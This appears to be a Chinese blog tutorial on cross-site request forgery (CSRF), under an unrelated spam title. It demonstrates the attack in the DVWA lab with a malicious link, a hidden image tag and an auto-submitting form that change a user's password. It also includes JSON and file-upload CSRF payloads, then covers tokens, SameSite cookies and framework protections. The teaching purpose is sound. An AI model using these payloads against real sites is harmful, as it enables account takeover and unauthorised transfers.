建广告网站需要多少钱软文推广平台排名
文章目录
- 一 初识CSRF
- 二 CSRF攻击的工作原理
- 三 DVWA环境中的CSRF演示
- 3.1 DVWA环境搭建
- 3.2 正常修改密码流程
- 3.3 构造恶意链接
- 3.4 自动化攻击演示
- 四 CSRF与XSS的区别
- 五 CSRF攻击的防御措施
- 5.1 使用CSRF Token
- 5.2 验证Referer头部
- 5.3 SameSite Cookie属性
- 5.4 双重验证
- 六、实际开发中的CSRF防护
- 6.1 Django中的CSRF防护
- 6.2 Laravel中的CSRF防护
- 6.3 Spring Security中的CSRF防护
- 七、CSRF攻击的高级变种
- 7.1 JSON CSRF
- 7.2 文件上传CSRF
- 八、CSRF攻击的检测与测试
- 8.1 手动测试步骤
- 8.2 使用工具测试
一 初识CSRF
-
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web安全漏洞,它利用了Web应用程序对用户浏览器的信任机制。简单来说,就是攻击者诱骗受害者在登录受信任网站的情况下,访问恶意网站或点击恶意链接,从而在不知情的情况下以受害者身份执行非预期的操作。
-
想象这样一个场景:你登录了网上银行后没有退出,然后不小心点击了一个朋友发来的"搞笑图片"链接。这个链接实际上暗藏玄机,它可能悄悄地向银行服务器发送转账请求,而银行认为这是你本人操作的,因为你的登录状态仍然有效。这就是CSRF攻击的典型例子。
二 CSRF攻击的工作原理
- 要理解CSRF,需要了解几个关键概念:
- Cookie的身份验证机制:网站通常使用Cookie来维持用户的登录状态
- 浏览器的同源策略:限制不同源的脚本获取或修改其他源的资源
- 请求的自动携带:浏览器会自动在请求中携带当前域的Cookie
CSRF攻击之所以能成功,是因为:
- 用户已经登录了目标网站(如银行、社交网络)
- 目标网站仅依赖Cookie进行身份验证
- 攻击者可以预测或知道请求的参数
- 用户在没有登出目标网站的情况下访问了恶意页面
三 DVWA环境中的CSRF演示
- 通过DVWA(Damn Vulnerable Web Application)安全演练的靶场来实际演示CSRF攻击。
3.1 DVWA环境搭建
- 确保已经安装了DVWA(可以通过XAMPP、Docker等方式安装),并将安全级别设置为"low":
- 登录DVWA(默认账号admin/password)
- 点击"DVWA Security",选择安全级别为"Low"
- 进入"CSRF"模块
3.2 正常修改密码流程
- 在DVWA的CSRF模块中,有一个简单的密码修改功能。正常流程如下:
http://ip:port/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
- 这个URL会触发密码修改操作,将密码改为"123456"。
3.3 构造恶意链接
- 攻击者可以构造这样一个链接,并诱骗已登录DVWA的用户点击:
<a href="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#">点击领取免费礼品卡!</a>
- 或者更隐蔽的方式,使用图片标签:
<img src="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#" width="0" height="0">
- 当用户点击链接或加载图片时,密码就被悄无声息地修改了。
3.4 自动化攻击演示
- 更高级的攻击可以通过自动提交表单实现:
<html><body><form action="http://192.168.1.21:4280/vulnerabilities/csrf/" method="GET"><input type="hidden" name="password_new" value="hacked"><input type="hidden" name="password_conf" value="hacked"><input type="hidden" name="Change" value="Change"></form><script>document.forms[0].submit();</script></body> </html>
- 当用户访问这个页面时,表单会自动提交,完成密码修改。
四 CSRF与XSS的区别
- 初学者常常混淆CSRF和XSS(跨站脚本攻击),它们确实有一些相似之处,但本质不同:
特性 | CSRF | XSS |
---|---|---|
攻击目标 | 利用用户的身份执行特定操作 | 窃取用户数据或会话信息 |
攻击方式 | 需要用户点击链接或访问页面 | 需要向页面注入恶意脚本 |
同源策略 | 利用浏览器对目标网站的同源策略绕过 | 直接违反同源策略 |
防御重点 | 验证请求来源 | 过滤用户输入和输出编码 |
五 CSRF攻击的防御措施
- 了解了CSRF的攻击原理后,我们来看看如何防御:
5.1 使用CSRF Token
最有效的防御方法是使用CSRF Token。它的工作原理是:
- 服务器生成一个随机Token,存储在session中
- 将Token嵌入表单或请求参数中
- 提交请求时,服务器验证Token是否匹配
- DVWA在"high"安全级别下就实现了CSRF Token:
// 生成Token
if( isset( $_SESSION[ 'session_token' ] ) ) {$session_token = $_SESSION[ 'session_token' ];
} else {generateSessionToken();
}// 验证Token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
5.2 验证Referer头部
- 检查HTTP请求的Referer头部,确保请求来自合法的源:
if (strpos($_SERVER['HTTP_REFERER'], 'https://yourdomain.com') !== 0) {die("非法请求来源");
}
5.3 SameSite Cookie属性
- 设置Cookie的SameSite属性可以限制第三方Cookie的发送:
Set-Cookie: sessionid=xxxx; SameSite=Strict; Secure; HttpOnly
SameSite有三种模式:
- Strict:完全禁止第三方Cookie
- Lax:宽松模式,允许部分安全请求(如导航)携带Cookie
- None:关闭SameSite保护(需要同时设置Secure)
5.4 双重验证
- 对于敏感操作(如转账、修改密码),要求用户进行二次验证(如输入密码、短信验证码等)。
六、实际开发中的CSRF防护
- 在实际开发中,现代框架通常内置了CSRF防护:
6.1 Django中的CSRF防护
# 模板中
<form method="post">{% csrf_token %}...
</form># 视图中
from django.views.decorators.csrf import csrf_protect@csrf_protect
def my_view(request):# 视图逻辑
6.2 Laravel中的CSRF防护
// 表单中
<form method="POST" action="/profile">@csrf...
</form>// 验证
Route::post('profile', function () {// 请求会自动验证CSRF token
});
6.3 Spring Security中的CSRF防护
// 默认启用,只需在表单中添加
<input type="hidden" name="${_csrf.parameterName}" value="${_csrf.token}"/>
七、CSRF攻击的高级变种
- 随着防御措施的普及,攻击者也开发出了一些高级CSRF技术:
7.1 JSON CSRF
- 当API仅依赖Cookie认证且接受JSONP或宽松的CORS策略时,可能通过构造恶意页面发起JSON请求:
<script>var xhr = new XMLHttpRequest();xhr.open("POST", "https://api.example.com/transfer", true);xhr.withCredentials = true;xhr.setRequestHeader("Content-Type", "application/json");xhr.send('{"amount":1000,"to":"attacker"}');
</script>
- 防御方法:严格设置CORS,拒绝非预期的Content-Type。
7.2 文件上传CSRF
- 如果文件上传接口没有CSRF防护,可能被利用来上传恶意文件:
<form action="https://example.com/upload" method="POST" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="token" value="malicious"/>
</form>
<script>document.forms[0].submit();</script>
八、CSRF攻击的检测与测试
- 作为开发者,如何测试自己的应用是否存在CSRF漏洞?
8.1 手动测试步骤
- 登录目标应用,获取有效会话
- 在另一个浏览器标签中打开恶意页面
- 检查是否能在用户不知情的情况下执行操作
- 检查关键操作是否有CSRF Token等防护
8.2 使用工具测试
- Burp Suite:使用CSRF PoC生成器
- OWASP ZAP:自动扫描CSRF漏洞
- CSRF Tester:Firefox插件